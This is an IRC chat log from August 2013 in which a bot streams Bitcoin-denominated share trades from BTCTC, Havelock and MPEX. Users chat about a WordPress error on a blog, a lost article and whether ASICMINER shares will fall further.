[BTCTC] [ACTIVEMINING] 50 @ 0.004513 = 0.2257 BTC [-] Aug 30 06:03:10 [BTCTC] [ACTIVEMINING] 1 @ 0.004508 BTC [-] Aug 30 06:03:11 [BTCTC] [ACTIVEMINING] 4 @ 0.004507 = 0.018 BTC [-] Aug 30 06:03:12 [BTCTC] [ACTIVEMINING] 112 @ 0.004501 = 0.5041 BTC [-] Aug 30 06:03:14 [BTCTC] [ACTIVEMINING] 450 @ 0.0045 = 2.025 BTC [-] Aug 30 06:03:15 [BTCTC] [ACTIVEMINING] 212 @ 0.004402 = 0.9332 BTC [-] Aug 30 06:03:15 [BTCTC] [ACTIVEMINING] 555 @ 0.004401 = 2.4426 BTC [-] Aug 30 06:03:16 [BTCTC] [ACTIVEMINING] 295 @ 0.0044 = 1.298 BTC [-] Aug 30 06:03:17 [BTCTC] [ACTIVEMINING] 75 @ 0.004356 = 0.3267 BTC [-] Aug 30 06:03:18 [BTCTC] [ACTIVEMINING] 300 @ 0.004355 = 1.3065 BTC [-] Aug 30 06:03:19 [BTCTC] [ACTIVEMINING] 250 @ 0.004335 = 1.0838 BTC [-] Aug 30 06:03:20 [BTCTC] [ACTIVEMINING] 184 @ 0.004334 = 0.7975 BTC [-] Aug 30 06:03:31 [BTCTC] [LABCOIN] 100 @ 0.0001 = 0.01 BTC [-] Aug 30 06:03:50 [BTCTC] [ASICMINER-PT] 2 @ 2.75 = 5.5 BTC [+] Aug 30 06:04:15 [BTCTC] [KENILWORTH] 45 @ 0.001799 = 0.081 BTC [+] Aug 30 06:05:39 [BTCTC] [ASICMINER-PT] 2 @ 2.75 = 5.5 BTC [+] Aug 30 06:05:41 what's this nonsense: ;;calc 0.0035 + .01258 Aug 30 06:05:47 [BTCTC] [LABCOIN] 470 @ 0.003799 = 1.7855 BTC [+] Aug 30 06:05:50 oops Aug 30 06:05:53 Deprecated: Function ereg_replace() is deprecated in /home/trilema/public_html/wp-content/themes/trilema/header.php on line 128 * Aug 30 06:05:59 lol Aug 30 06:06:15 [BTCTC] [KENILWORTH] 201 @ 0.0018 = 0.3618 BTC [+] Aug 30 06:07:52 [BTCTC] [LABCOIN] 150 @ 0.003799 = 0.5699 BTC [+] Aug 30 06:09:26 thestringpuller where do you see that ?! Aug 30 06:11:42 on every page Aug 30 06:11:47 may just be my browser Aug 30 06:11:52 but it looks like it's coming from wordpress Aug 30 06:11:57 want a screen shot? Aug 30 06:12:31 http://i.imgur.com/e9xsTSB.png Aug 30 06:13:46 well the os got upgraded and etc. Aug 30 06:13:51 should be fixed im told. Aug 30 06:14:29 [BTCTC] [DMS.SELLING] 20 @ 0.0125 = 0.25 BTC [-] Aug 30 06:14:30 [BTCTC] [DMS.SELLING] 21 @ 0.01259 = 0.2644 BTC [+] Aug 30 06:14:31 [BTCTC] [DMS.SELLING] 1 @ 0.01259 BTC [+] Aug 30 06:14:32 [BTCTC] [DMS.SELLING] 10 @ 0.0126 = 0.126 BTC [+] Aug 30 06:14:50 there we go Aug 30 06:14:51 :D Aug 30 06:14:53 good to go Aug 30 06:15:02 also what happened to the recent eulora article? Aug 30 06:15:06 did that get lost in the crash? Aug 30 06:15:43 that's what im saying. do you ahve a cached copy ? Aug 30 06:16:02 [BTCTC] [ASICMINER-PT] 2 @ 2.75 = 5.5 BTC [+] Aug 30 06:16:17 [BTCTC] [LTC-ATF.B2] 1 @ 0.0104 BTC [+] Aug 30 06:16:33 lemme check Aug 30 06:16:36 i looked , i do not think i have it Aug 30 06:17:20 jesus the cursed article of doom Aug 30 06:17:24 it was pretty cool too. Aug 30 06:17:59 [BTCTC] [ASICMINER-PT] 1 @ 2.75 BTC [+] Aug 30 06:19:22 [BTCTC] [BTC-BOND] 1 @ 0.00999 BTC [-] Aug 30 06:19:45 [BTCTC] [LABCOIN] 20 @ 0.003798 = 0.076 BTC [-] Aug 30 06:19:47 [BTCTC] [LABCOIN] 5100 @ 0.003798 = 19.3698 BTC [-] Aug 30 06:19:48 [BTCTC] [LABCOIN] 9727 @ 0.003799 = 36.9529 BTC [+] Aug 30 06:19:49 [BTCTC] [LABCOIN] 50 @ 0.003799 = 0.19 BTC [+] Aug 30 06:19:50 [BTCTC] [LABCOIN] 4553 @ 0.0038 = 17.3014 BTC [+] Aug 30 06:19:51 [BTCTC] [LABCOIN] 439 @ 0.0038 = 1.6682 BTC [+] Aug 30 06:20:15 [BTCTC] [BTC-BOND] 15 @ 0.00995 = 0.1493 BTC [-] Aug 30 06:21:08 [BTCTC] [LABCOIN] 100 @ 0.003801 = 0.3801 BTC [+] Aug 30 06:21:12 [BTCTC] [BTC-BOND] 4 @ 0.009813 = 0.0393 BTC [-] Aug 30 06:22:52 [BTCTC] [LABCOIN] 250 @ 0.003823 = 0.9558 BTC [+] Aug 30 06:22:52 [BTCTC] [LABCOIN] 200 @ 0.003835 = 0.767 BTC [+] Aug 30 06:22:52 [BTCTC] [LABCOIN] 200 @ 0.00384 = 0.768 BTC [+] Aug 30 06:22:53 [BTCTC] [LABCOIN] 4000 @ 0.00385 = 15.4 BTC [+] Aug 30 06:23:14 [BTCTC] [LABCOIN] 100 @ 0.003883 = 0.3883 BTC [+] Aug 30 06:23:15 [BTCTC] [LABCOIN] 25 @ 0.003883 = 0.0971 BTC [+] Aug 30 06:23:35 [BTCTC] [LABCOIN] 500 @ 0.00385 = 1.925 BTC [-] Aug 30 06:23:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0266 BTC [-] Aug 30 06:23:58 nope Aug 30 06:24:03 looks like my cache clears itself daily Aug 30 06:24:13 last thing I got is the article on rape Aug 30 06:24:14 lol Aug 30 06:24:19 sorry mang :( Aug 30 06:24:50 [BTCTC] [LABCOIN] 867 @ 0.00385 = 3.338 BTC [-] Aug 30 06:26:58 where's fucking nsa when you need them Aug 30 06:31:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.02601 BTC [-] Aug 30 06:34:37 [BTCTC] [NASTY-PT] 459 @ 0.002301 = 1.0562 BTC [-] Aug 30 06:34:39 [BTCTC] [NASTY-PT] 20 @ 0.0023 = 0.046 BTC [-] Aug 30 06:34:40 [BTCTC] [NASTY-PT] 1 @ 0.002284 BTC [-] Aug 30 06:34:40 [BTCTC] [NASTY-PT] 1 @ 0.002281 BTC [-] Aug 30 06:34:42 [BTCTC] [NASTY-PT] 800 @ 0.00228 = 1.824 BTC [-] Aug 30 06:34:43 [BTCTC] [NASTY-PT] 1 @ 0.002279 BTC [-] Aug 30 06:35:52 [MPEX] [S.MPOE] 2167 @ 0.00086978 = 1.8848 BTC [+] Aug 30 06:35:54 [MPEX] [S.MPOE] 8483 @ 0.0008698 = 7.3785 BTC [+] Aug 30 06:40:22 [BTCTC] [LABCOIN] 2 @ 0.003751 = 0.0075 BTC [-] Aug 30 06:40:35 [BTCTC] [LABCOIN] 10 @ 0.003885 = 0.0389 BTC [+] Aug 30 06:42:02 [BTCTC] [KENILWORTH] 5 @ 0.0018 = 0.009 BTC [+] Aug 30 06:43:29 [BTCTC] [TAT.ASICMINER] 17 @ 0.026 = 0.442 BTC [-] Aug 30 06:43:30 [BTCTC] [TAT.ASICMINER] 8 @ 0.026 = 0.208 BTC [-] Aug 30 06:43:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.02545 = 0.1018 BTC [-] Aug 30 06:43:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.02542 = 0.0508 BTC [-] Aug 30 06:43:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] Aug 30 06:43:34 [BTCTC] [TAT.ASICMINER] 7 @ 0.02506 = 0.1754 BTC [-] Aug 30 06:43:35 [BTCTC] [TAT.ASICMINER] 35 @ 0.02505 = 0.8768 BTC [-] Aug 30 06:43:36 [BTCTC] [TAT.ASICMINER] 45 @ 0.02503 = 1.1264 BTC [-] Aug 30 06:43:38 [BTCTC] [TAT.ASICMINER] 19 @ 0.02502 = 0.4754 BTC [-] Aug 30 06:43:39 [BTCTC] [TAT.ASICMINER] 4 @ 0.02501 = 0.1 BTC [-] Aug 30 06:43:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.02501 = 0.1 BTC [-] Aug 30 06:43:41 [BTCTC] [TAT.ASICMINER] 200 @ 0.025 = 5 BTC [-] Aug 30 06:45:12 [BTCTC] [ASICMINER-PT] 1 @ 2.707 BTC [-] Aug 30 06:45:25 [BTCTC] [LABCOIN] 2 @ 0.003883 = 0.0078 BTC [-] Aug 30 06:45:57 [HAVELOCK] [CFIG] 1 @ 0.16997092 BTC [-] Aug 30 06:46:08 [BTCTC] [TAT.ASICMINER] 14 @ 0.02458 = 0.3441 BTC [-] Aug 30 06:46:16 [BTCTC] [TAT.ASICMINER] 95 @ 0.02457 = 2.3342 BTC [-] Aug 30 06:46:23 [BTCTC] [LABCOIN] 28 @ 0.003884 = 0.1088 BTC [+] Aug 30 06:46:24 [BTCTC] [TAT.ASICMINER] 22 @ 0.02457 = 0.5405 BTC [-] Aug 30 06:46:30 [BTCTC] [TAT.ASICMINER] 41 @ 0.02456 = 1.007 BTC [-] Aug 30 06:46:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.02455 = 0.2455 BTC [-] Aug 30 06:46:37 [BTCTC] [TAT.ASICMINER] 9 @ 0.02455 = 0.221 BTC [-] Aug 30 06:46:38 [BTCTC] [TAT.ASICMINER] 50 @ 0.02455 = 1.2275 BTC [-] Aug 30 06:46:39 [BTCTC] [TAT.ASICMINER] 12 @ 0.02451 = 0.2941 BTC [-] Aug 30 06:46:40 [BTCTC] [TAT.ASICMINER] 240 @ 0.0245 = 5.88 BTC [-] Aug 30 06:46:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.02444 = 0.0489 BTC [-] Aug 30 06:46:42 [BTCTC] [TAT.ASICMINER] 67 @ 0.0241 = 1.6147 BTC [-] Aug 30 06:46:43 [BTCTC] [TAT.ASICMINER] 150 @ 0.02403 = 3.6045 BTC [-] Aug 30 06:46:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.02402 = 0.0961 BTC [-] Aug 30 06:46:45 [BTCTC] [TAT.ASICMINER] 6 @ 0.02402 = 0.1441 BTC [-] Aug 30 06:46:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.02401 = 0.096 BTC [-] Aug 30 06:46:47 [BTCTC] [TAT.ASICMINER] 50 @ 0.02401 = 1.2005 BTC [-] Aug 30 06:46:48 [BTCTC] [TAT.ASICMINER] 65 @ 0.024 = 1.56 BTC [-] Aug 30 06:46:49 [BTCTC] [TAT.ASICMINER] 84 @ 0.024 = 2.016 BTC [-] Aug 30 06:46:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.024 = 0.072 BTC [-] Aug 30 06:46:52 [BTCTC] [TAT.ASICMINER] 15 @ 0.024 = 0.36 BTC [-] Aug 30 06:46:53 [BTCTC] [TAT.ASICMINER] 4 @ 0.024 = 0.096 BTC [-] Aug 30 06:46:53 [BTCTC] [TAT.ASICMINER] 100 @ 0.024 = 2.4 BTC [-] Aug 30 06:46:54 [BTCTC] [TAT.ASICMINER] 300 @ 0.024 = 7.2 BTC [-] Aug 30 06:46:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [-] Aug 30 06:47:06 [BTCTC] [LABCOIN] 1 @ 0.003884 BTC [+] Aug 30 06:47:35 [BTCTC] [LABCOIN] 5 @ 0.003721 = 0.0186 BTC [-] Aug 30 06:47:48 [BTCTC] [LABCOIN] 45 @ 0.003721 = 0.1674 BTC [-] Aug 30 06:49:10 [BTCTC] [ASICMINER-PT] 1 @ 2.707 BTC [-] Aug 30 06:49:46 [BTCTC] [LABCOIN] 5 @ 0.003721 = 0.0186 BTC [-] Aug 30 06:50:19 [BTCTC] [ACTIVEMINING] 209 @ 0.004816 = 1.0065 BTC [+] Aug 30 06:50:22 [BTCTC] [LABCOIN] 20 @ 0.00372 = 0.0744 BTC [-] Aug 30 06:50:47 [BTCTC] [LABCOIN] 25 @ 0.003718 = 0.093 BTC [-] Aug 30 06:52:26 [BTCTC] [ACTIVEMINING] 3 @ 0.004816 = 0.0144 BTC [+] **** BEGIN LOGGING AT Fri Aug 30 14:16:32 2013 Aug 30 14:31:55 http://www.reddit.com/r/videos/comments/1ldqh8/dude_finds_lava_pisses_on_it/ lol whole reddit is over it Aug 30 14:31:57 Dude finds lava, pisses on it : videos Aug 30 14:34:27 i bet that smells awesome Aug 30 15:00:35 lava stinks anywya Aug 30 15:00:38 tons of hs etc Aug 30 15:01:00 assbot dead? Aug 30 15:01:21 er hehe i was kind of hoping the ticker would spam it off the page... :P Aug 30 15:10:12 no trades for over 30 mins on btct Aug 30 15:10:49 there we go Aug 30 15:10:50 am dump as you typ that hehe Aug 30 15:11:01 and there Aug 30 15:11:05 lol Aug 30 15:11:12 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [-] Aug 30 15:11:13 [BTCTC] [ASICMINER-PT] 1 @ 2.575 BTC [-] Aug 30 15:11:14 [BTCTC] [ASICMINER-PT] 4 @ 2.571 = 10.284 BTC [-] Aug 30 15:11:15 [BTCTC] [ASICMINER-PT] 25 @ 2.57 = 64.25 BTC [-] Aug 30 15:11:15 [BTCTC] [ASICMINER-PT] 3 @ 2.562 = 7.686 BTC [-] Aug 30 15:11:16 [BTCTC] [ASICMINER-PT] 1 @ 2.561 BTC [-] Aug 30 15:11:17 [BTCTC] [ASICMINER-PT] 6 @ 2.561 = 15.366 BTC [-] Aug 30 15:11:18 [BTCTC] [ASICMINER-PT] 1 @ 2.56 BTC [-] Aug 30 15:11:19 [BTCTC] [ASICMINER-PT] 10 @ 2.56 = 25.6 BTC [-] Aug 30 15:11:20 [BTCTC] [ASICMINER-PT] 1 @ 2.56 BTC [-] Aug 30 15:11:21 [BTCTC] [ASICMINER-PT] 1 @ 2.56 BTC [-] Aug 30 15:11:22 [BTCTC] [ASICMINER-PT] 4 @ 2.556 = 10.224 BTC [-] Aug 30 15:11:23 [BTCTC] [ASICMINER-PT] 1 @ 2.555 BTC [-] Aug 30 15:11:24 [BTCTC] [ASICMINER-PT] 1 @ 2.554 BTC [-] Aug 30 15:11:25 [BTCTC] [ASICMINER-PT] 18 @ 2.554 = 45.972 BTC [-] Aug 30 15:11:25 [BTCTC] [ASICMINER-PT] 10 @ 2.553 = 25.53 BTC [-] Aug 30 15:11:26 [BTCTC] [ASICMINER-PT] 1 @ 2.553 BTC [-] Aug 30 15:11:27 [BTCTC] [ASICMINER-PT] 1 @ 2.552 BTC [-] Aug 30 15:11:28 [BTCTC] [ASICMINER-PT] 2 @ 2.552 = 5.104 BTC [-] Aug 30 15:11:29 [BTCTC] [ASICMINER-PT] 1 @ 2.551 BTC [-] Aug 30 15:11:30 [BTCTC] [ASICMINER-PT] 2 @ 2.55 = 5.1 BTC [-] Aug 30 15:11:31 [BTCTC] [ASICMINER-PT] 3 @ 2.55 = 7.65 BTC [-] Aug 30 15:11:32 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [-] Aug 30 15:11:33 [BTCTC] [ASICMINER-PT] 3 @ 2.53 = 7.59 BTC [-] Aug 30 15:11:34 [BTCTC] [ASICMINER-PT] 3 @ 2.529 = 7.587 BTC [-] Aug 30 15:11:34 [BTCTC] [ASICMINER-PT] 32 @ 2.528 = 80.896 BTC [-] Aug 30 15:11:35 [BTCTC] [ASICMINER-PT] 1 @ 2.52 BTC [-] Aug 30 15:11:36 [BTCTC] [ASICMINER-PT] 15 @ 2.516 = 37.74 BTC [-] Aug 30 15:11:37 [BTCTC] [ASICMINER-PT] 4 @ 2.515 = 10.06 BTC [-] Aug 30 15:11:38 [BTCTC] [ASICMINER-PT] 9 @ 2.514 = 22.626 BTC [-] Aug 30 15:11:39 [BTCTC] [ASICMINER-PT] 2 @ 2.511 = 5.022 BTC [-] Aug 30 15:11:40 [HAVELOCK] [AM100] 1 @ 0.026 BTC [-] Aug 30 15:11:46 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 30 15:11:48 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 30 15:11:49 [BTCTC] [ASICMINER-PT] 4 @ 2.51 = 10.04 BTC [-] Aug 30 15:11:53 Lol Aug 30 15:11:56 shieeeet Aug 30 15:11:57 inb4 excess flood Aug 30 15:12:07 I just said AM didn't seem to be trading much anymore Aug 30 15:12:11 is that money going into lc? Aug 30 15:12:15 holy shit I am the biggest counter indicator alive Aug 30 15:13:23 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0008713 = 0.0017 BTC [+] Aug 30 15:13:45 Nah it's not going into labcoin I think, Labcoin isn't going to move much this weekend. Aug 30 15:13:48 [BTCTC] [ASICMINER-PT] 2 @ 2.51 = 5.02 BTC [-] Aug 30 15:13:49 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 30 15:14:03 [BTCTC] [ASICMINER-PT] 6 @ 2.511 = 15.066 BTC [+] Aug 30 15:14:32 [BTCTC] [ASICMINER-PT] 39 @ 2.51 = 97.89 BTC [-] Aug 30 15:14:33 [BTCTC] [ASICMINER-PT] 2 @ 2.51 = 5.02 BTC [-] Aug 30 15:14:35 [BTCTC] [ASICMINER-PT] 5 @ 2.51 = 12.55 BTC [-] Aug 30 15:14:36 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 30 15:14:37 [BTCTC] [ASICMINER-PT] 11 @ 2.507 = 27.577 BTC [-] Aug 30 15:14:38 [BTCTC] [ASICMINER-PT] 10 @ 2.507 = 25.07 BTC [-] Aug 30 15:14:39 [BTCTC] [ASICMINER-PT] 10 @ 2.505 = 25.05 BTC [-] Aug 30 15:14:39 [BTCTC] [ASICMINER-PT] 3 @ 2.505 = 7.515 BTC [-] Aug 30 15:14:41 [BTCTC] [ASICMINER-PT] 1 @ 2.503 BTC [-] Aug 30 15:14:42 [BTCTC] [ASICMINER-PT] 1 @ 2.502 BTC [-] Aug 30 15:14:43 [BTCTC] [ASICMINER-PT] 5 @ 2.502 = 12.51 BTC [-] Aug 30 15:14:44 [BTCTC] [ASICMINER-PT] 10 @ 2.501 = 25.01 BTC [-] Aug 30 15:14:45 [BTCTC] [ASICMINER-PT] 2 @ 2.501 = 5.002 BTC [-] Aug 30 15:14:46 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] Aug 30 15:14:47 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] Aug 30 15:14:48 [BTCTC] [ASICMINER-PT] 10 @ 2.5 = 25 BTC [-] Aug 30 15:14:49 [BTCTC] [ASICMINER-PT] 20 @ 2.5 = 50 BTC [-] Aug 30 15:14:50 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 30 15:14:50 [BTCTC] [ASICMINER-PT] 4 @ 2.5 = 10 BTC [-] Aug 30 15:14:51 [BTCTC] [ASICMINER-PT] 99 @ 2.5 = 247.5 BTC [-] Aug 30 15:14:53 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [-] Aug 30 15:14:53 lol wtf, I suck :D. Aug 30 15:14:57 hahah Aug 30 15:15:32 [HAVELOCK] [AM100] 3 @ 0.026 = 0.078 BTC [-] Aug 30 15:15:42 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 30 15:15:52 [BTCTC] [TAT.ASICMINER] 16 @ 0.02535 = 0.4056 BTC [+] Aug 30 15:15:53 i like it, I have a buy order open in the low 2.4's. Aug 30 15:15:54 [BTCTC] [TAT.ASICMINER] 34 @ 0.02534 = 0.8616 BTC [-] Aug 30 15:15:55 [BTCTC] [TAT.ASICMINER] 17 @ 0.02534 = 0.4308 BTC [-] Aug 30 15:16:03 only 1590 btc to go until 1.8 Aug 30 15:16:19 [BTCTC] [LABCOIN] 300 @ 0.003702 = 1.1106 BTC [-] Aug 30 15:16:23 gecko_x2: You still believing 1.8? Aug 30 15:16:27 which is where this sucker is heading Aug 30 15:16:28 [BTCTC] [ASICMINER-PT] 2 @ 2.499 = 4.998 BTC [-] Aug 30 15:16:34 yea Aug 30 15:16:38 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [-] Aug 30 15:16:50 would you actually buy at 1.8 though? Aug 30 15:16:54 [BTCTC] [TAT.ASICMINER] 33 @ 0.02534 = 0.8362 BTC [-] Aug 30 15:16:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.02531 = 0.0759 BTC [-] Aug 30 15:16:57 [BTCTC] [TAT.ASICMINER] 17 @ 0.0253 = 0.4301 BTC [-] Aug 30 15:16:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [-] Aug 30 15:17:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.02511 = 0.1004 BTC [-] Aug 30 15:17:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.0251 = 0.0502 BTC [-] Aug 30 15:17:02 i might Aug 30 15:17:02 [BTCTC] [TAT.ASICMINER] 20 @ 0.02508 = 0.5016 BTC [-] Aug 30 15:17:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.02505 = 0.1002 BTC [-] Aug 30 15:17:04 [BTCTC] [TAT.ASICMINER] 20 @ 0.02504 = 0.5008 BTC [-] Aug 30 15:17:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.02503 BTC [-] Aug 30 15:17:05 [BTCTC] [TAT.ASICMINER] 12 @ 0.02501 = 0.3001 BTC [-] Aug 30 15:17:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.025 = 0.25 BTC [-] Aug 30 15:17:07 [BTCTC] [TAT.ASICMINER] 40 @ 0.025 = 1 BTC [-] Aug 30 15:17:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.025 = 0.25 BTC [-] Aug 30 15:17:17 i'd prolly set an even lower bid though Aug 30 15:17:27 for the ultimate capitulation Aug 30 15:17:40 is there a stock chart site that isn't coinflow? Aug 30 15:17:47 that could be like 0.8 - 1.2 Aug 30 15:17:49 but gecko_x2, why would there be any capitulation? AM's healthy... Aug 30 15:18:26 yes San1ty but first there has to be maximum pain Aug 30 15:18:29 the amount of hardware due to come online is making investors crap their pants Aug 30 15:18:43 all these shares have been sold from one person to the next Aug 30 15:18:56 Duffer1, gecko_x2: yeah competition is strong, but what reason is there to believe AM can't cope? Aug 30 15:18:58 each one expecting to sell it for a higher price Aug 30 15:19:12 eventually, at 4.8, the last bagholder was reached Aug 30 15:19:41 and now it will all unwind until we reach the original breakout point, and maximum pain for the investors. Aug 30 15:20:12 gecko_x2: that would be at around 0.6 Aug 30 15:20:12 then it will rise and settle at a fair value. Aug 30 15:20:16 good question sanlty_ I haven't been keeping up with AM plans so i duuno Aug 30 15:20:19 maybe Aug 30 15:20:20 gecko_x2: but at those prices, who wouldn't buy? Aug 30 15:20:29 i would :p Aug 30 15:20:35 yea no doubt Aug 30 15:20:40 gecko_x2: yeah that's clear, but anyone besides you? :p Aug 30 15:20:47 sure Aug 30 15:20:53 [BTCTC] [ACTIVEMINING] 3 @ 0.004755 = 0.0143 BTC [-] Aug 30 15:20:54 those with all the btc :) Aug 30 15:20:58 [HAVELOCK] [AM1] 9 @ 2.68 = 24.12 BTC [+] Aug 30 15:21:29 even if the fair value is let's say 2.5 Aug 30 15:21:38 there still has to be pain Aug 30 15:22:04 I don't see for it all to unwind. I imagine confidence has been shaken a bit with the low divs, but if AM can keep up and pay out nice div's. there shouldn't be a reason for a massive selloff. Aug 30 15:22:14 when it reaches 1.8 i would start adding bids all the way down to 0.8 Aug 30 15:22:46 but even 33% divs is 3 years, which is forever in bitcoin land Aug 30 15:23:00 and there are so many new and upcoming avenues to invest in Aug 30 15:23:18 and only so many btc in circulation Aug 30 15:23:24 and so many bagholders in AM Aug 30 15:23:30 it has to unwind first Aug 30 15:23:32 gecko_x2: correct, but how many of them are a serious threat? Aug 30 15:23:42 [HAVELOCK] [XBOND] 711 @ 0.00118999 = 0.8461 BTC [+] Aug 30 15:23:52 we don't know that Aug 30 15:24:03 [HAVELOCK] [XBOND] 600 @ 0.00119 = 0.714 BTC [+] Aug 30 15:24:20 [BTCTC] [BASIC-MINING] 1 @ 0.1814 BTC [+] Aug 30 15:24:38 [HAVELOCK] [XBOND] 999 @ 0.0012 = 1.1988 BTC [+] Aug 30 15:24:41 [HAVELOCK] [XBOND] 3000 @ 0.0012 = 3.6 BTC [+] Aug 30 15:24:41 moar pain!! i say :p Aug 30 15:25:27 [BTCTC] [TAT.ASICMINER] 7 @ 0.02499 = 0.1749 BTC [-] Aug 30 15:27:43 [BTCTC] [ACTIVEMINING] 25 @ 0.004541 = 0.1135 BTC [-] Aug 30 15:27:44 [BTCTC] [ACTIVEMINING] 100 @ 0.00454 = 0.454 BTC [-] Aug 30 15:27:46 [BTCTC] [ACTIVEMINING] 188 @ 0.004429 = 0.8327 BTC [-] Aug 30 15:27:47 [BTCTC] [ACTIVEMINING] 47 @ 0.004425 = 0.208 BTC [-] Aug 30 15:27:48 [BTCTC] [ACTIVEMINING] 187 @ 0.004332 = 0.8101 BTC [-] Aug 30 15:27:49 [BTCTC] [ACTIVEMINING] 250 @ 0.004331 = 1.0828 BTC [-] Aug 30 15:27:50 [BTCTC] [ACTIVEMINING] 203 @ 0.004329 = 0.8788 BTC [-] Aug 30 15:28:18 [BTCTC] [TAT.ASICMINER] 12 @ 0.02498 = 0.2998 BTC [-] Aug 30 15:28:43 [BTCTC] [NASTY-PT] 1 @ 0.002043 BTC [-] Aug 30 15:29:54 gecko_x2: If what you think is going to come through all those early seller funds, where are they going? Labcoin? Aug 30 15:33:58 well actm is up 100% and lc is up some 250% Aug 30 15:34:24 then there is another nice asset class.. btc Aug 30 15:37:45 [BTCTC] [COGNITIVE] 1 @ 0.315 BTC [-] Aug 30 15:37:47 [BTCTC] [COGNITIVE] 1 @ 0.315 BTC [-] Aug 30 15:37:47 [BTCTC] [COGNITIVE] 5 @ 0.31 = 1.55 BTC [-] Aug 30 15:38:15 [BTCTC] [TAT.ASICMINER] 50 @ 0.02463 = 1.2315 BTC [-] Aug 30 15:38:17 [BTCTC] [TAT.ASICMINER] 40 @ 0.0246 = 0.984 BTC [-] Aug 30 15:38:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.0245 = 0.245 BTC [-] Aug 30 15:38:19 [BTCTC] [TAT.ASICMINER] 3 @ 0.02432 = 0.073 BTC [-] Aug 30 15:38:21 [BTCTC] [TAT.ASICMINER] 8 @ 0.02411 = 0.1929 BTC [-] Aug 30 15:38:22 [BTCTC] [TAT.ASICMINER] 43 @ 0.0241 = 1.0363 BTC [-] Aug 30 15:38:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.02402 = 0.2402 BTC [-] Aug 30 15:38:24 [BTCTC] [TAT.ASICMINER] 26 @ 0.02402 = 0.6245 BTC [-] Aug 30 15:40:41 [BTCTC] [LABCOIN] 40 @ 0.003766 = 0.1506 BTC [+] Aug 30 15:40:42 [BTCTC] [LABCOIN] 20 @ 0.003767 = 0.0753 BTC [+] Aug 30 15:40:44 [BTCTC] [LABCOIN] 43 @ 0.003775 = 0.1623 BTC [+] Aug 30 15:40:44 [BTCTC] [LABCOIN] 176 @ 0.003776 = 0.6646 BTC [+] Aug 30 15:40:45 [BTCTC] [LABCOIN] 500 @ 0.003777 = 1.8885 BTC [+] Aug 30 15:40:46 [BTCTC] [LABCOIN] 345 @ 0.00379 = 1.3076 BTC [+] Aug 30 15:40:47 [BTCTC] [LABCOIN] 376 @ 0.003795 = 1.4269 BTC [+] Aug 30 15:44:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.02497 = 0.2497 BTC [+] Aug 30 15:47:01 gecko_gs2: arnt lc up 380% now Aug 30 15:47:43 [15:47:32] !return 0.001 0.0037 Aug 30 15:47:43 [15:47:33] 270.00% Aug 30 15:48:20 [BTCTC] [LABCOIN] 20 @ 0.003713 = 0.0743 BTC [-] Aug 30 15:48:22 [BTCTC] [LABCOIN] 100 @ 0.003712 = 0.3712 BTC [-] Aug 30 15:48:23 [BTCTC] [LABCOIN] 400 @ 0.003701 = 1.4804 BTC [-] Aug 30 15:48:28 [HAVELOCK] [AM1] 3 @ 2.84 = 8.52 BTC [+] Aug 30 15:51:21 [BTCTC] [LABCOIN] 150 @ 0.003705 = 0.5558 BTC [+] Aug 30 15:51:23 [BTCTC] [LABCOIN] 674 @ 0.0037 = 2.4938 BTC [-] Aug 30 15:52:29 [BTCTC] [TAT.ASICMINER] 25 @ 0.02496 = 0.624 BTC [-] Aug 30 15:52:30 [BTCTC] [TAT.ASICMINER] 50 @ 0.02497 = 1.2485 BTC [+] Aug 30 15:52:31 [BTCTC] [TAT.ASICMINER] 15 @ 0.02499 = 0.3749 BTC [+] Aug 30 15:52:32 [BTCTC] [TAT.ASICMINER] 23 @ 0.025 = 0.575 BTC [+] Aug 30 15:52:47 [BTCTC] [BASIC-MINING] 3 @ 0.1814 = 0.5442 BTC [+] Aug 30 15:53:45 [BTCTC] [ESECURITYSABTC] 1 @ 0.2298 BTC [-] Aug 30 15:54:22 [HAVELOCK] [CFIG] 13 @ 0.165 = 2.145 BTC [-] Aug 30 15:55:17 so the stock is up 370% then Aug 30 15:55:50 ? Aug 30 15:55:59 no, it's up 270% Aug 30 15:56:01 :D Aug 30 15:56:14 [BTCTC] [NASTY-PT] 79 @ 0.002043 = 0.1614 BTC [-] Aug 30 15:57:16 its up 370% but your roi if you bought at 0.001 and sold now would 270% no? Aug 30 15:57:46 but you could not buy it at 0 Aug 30 15:58:10 [BTCTC] [LABCOIN] 104 @ 0.003675 = 0.3822 BTC [-] Aug 30 15:58:12 [BTCTC] [LABCOIN] 20 @ 0.003674 = 0.0735 BTC [-] Aug 30 15:58:13 [BTCTC] [LABCOIN] 121 @ 0.003673 = 0.4444 BTC 